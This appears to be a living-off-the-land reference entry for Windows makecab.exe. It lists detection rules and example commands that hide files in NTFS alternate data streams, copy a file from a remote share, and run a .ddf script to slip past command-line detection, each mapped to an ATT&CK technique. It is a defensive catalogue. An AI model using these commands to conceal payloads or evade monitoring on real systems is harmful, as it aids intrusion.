.. /Makecab.exe

Star

Paths:

• C:\Windows\System32\makecab.exe
• C:\Windows\SysWOW64\makecab.exe

Resources:

• https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
• https://ss64.com/nt/makecab-directives.html
• https://www.pearsonhighered.com/assets/samplechapter/0/7/8/9/0789728583.pdf
• https://learn.microsoft.com/en-us/previous-versions/bb417343(v=msdn.10)#makecab-application

Acknowledgements:

• Oddvar Moe (@oddvarmoe)

Detections:

• Sigma: proc_creation_win_susp_alternate_data_streams.yml
• Elastic: defense_evasion_misc_lolbin_connecting_to_the_internet.toml
• IOC: Makecab retrieving files from Internet
• IOC: Makecab storing data into alternate data streams

Alternate data streams

1. Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.

   makecab C:\Windows\Temp\file.exe C:\Windows\Temp\file.ext:autoruns.cab

   Use case

   Hide data compressed into an alternate data stream

   Privileges required

   User

   Operating systems

   Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11

   ATT&CK® technique

   T1564.004: NTFS File Attributes

   Tags

   Type: Compression

2. Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.

   makecab \\servername\C$\Windows\Temp\file.exe C:\Windows\Temp\file.ext:file.cab

   Use case

   Hide data compressed into an alternate data stream

   Privileges required

   User

   Operating systems

   Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11

   ATT&CK® technique

   T1564.004: NTFS File Attributes

   Tags

   Type: Compression

Download

1. Download and compresses the target file and stores it in the target file.

   makecab \\servername\C$\Windows\Temp\file.exe C:\Windows\Temp\file.cab

   Use case

   Download file and compress into a cab file

   Privileges required

   User

   Operating systems

   Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11

   ATT&CK® technique

   T1105: Ingress Tool Transfer

   Tags

   Type: Compression

Execute

1. Execute makecab commands as defined in the specified Diamond Definition File (.ddf); see resources for the format specification.

   makecab /F file.ddf

   Use case

   Bypass command-line based detections

   Privileges required

   User

   Operating systems

   Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11

   ATT&CK® technique

   T1036: Masquerading

   Tags

   Type: Compression